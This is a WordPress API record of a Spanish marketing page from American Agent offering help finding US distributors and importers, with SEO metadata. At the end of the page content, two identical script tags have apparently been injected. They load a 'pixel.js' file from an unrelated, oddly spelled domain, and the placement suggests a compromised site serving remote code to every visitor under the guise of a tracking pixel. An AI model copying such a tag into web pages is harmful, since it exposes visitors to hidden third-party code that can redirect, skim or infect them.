{"id":3143,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-10T16:28:07","modified_gmt":"2014-09-10T20:28:07","slug":"buscar-usa-distribuidores-e-importadores","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/","title":{"rendered":"Buscar USA Distribuidores e Importadores"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-9aad60a678a8442f477c4f74032550dc\">\n#top .av-special-heading.av-av_heading-9aad60a678a8442f477c4f74032550dc{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-9aad60a678a8442f477c4f74032550dc .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-9aad60a678a8442f477c4f74032550dc .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-9aad60a678a8442f477c4f74032550dc av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >C\u00f3mo trabajar con distribuidores de los Estados Unidos<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-7f317741ca2418a36614f046e139f8be '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Tal vez su empresa tiene una l\u00ednea de productos muy complejos y t\u00e9cnicos, o tal vez sus actividades de posventa requieren m\u00e1s apoyo localizado &#8230;<\/p>\n<p>Hay muchas razones por las cuales asociarse con distribuidores estadounidenses de renombre, mayoristas, importadores, u otro tipo de empresas colaboradoras, que operan con un mecanismo fuerte de ventas y con el personal que entiende un mercado determinado, es a veces la \u00fanica manera de entrar en el mercado de EE.UU.<\/p>\n<p>American Agent se encuentra en una posici\u00f3n ideal para ayudarle.\u00a0 Nuestro objetivo es posicionarle de la forma m\u00e1s fuerte posible frente a posibles socios en EE.UU., y establecer relaciones comerciales duraderas entre usted y distribuidores estadounidenses de buena reputaci\u00f3n.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3143","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buscar USA Distribuidores e Importadores<\/title>\n<meta name=\"description\" content=\"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buscar USA Distribuidores e Importadores\" \/>\n<meta property=\"og:description\" content=\"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:28:07+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/buscar-usa-distribuidores-e-importadores\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/buscar-usa-distribuidores-e-importadores\\\/\",\"name\":\"Buscar USA Distribuidores e Importadores\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-10T20:28:07+00:00\",\"description\":\"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/buscar-usa-distribuidores-e-importadores\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/buscar-usa-distribuidores-e-importadores\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/buscar-usa-distribuidores-e-importadores\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Buscar USA Distribuidores e Importadores\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buscar USA Distribuidores e Importadores","description":"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/","og_locale":"es_ES","og_type":"article","og_title":"Buscar USA Distribuidores e Importadores","og_description":"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.","og_url":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:28:07+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/","url":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/","name":"Buscar USA Distribuidores e Importadores","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-10T20:28:07+00:00","description":"Podemos ayudarle a encontrar ya a comunicarse con los mejores distribuidores de Am\u00e9rica, mayoristas y importadores. C\u00f3mo vender en Estados Unidos.","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/buscar-usa-distribuidores-e-importadores\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"Buscar USA Distribuidores e Importadores"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3143","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=3143"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3143\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=3143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}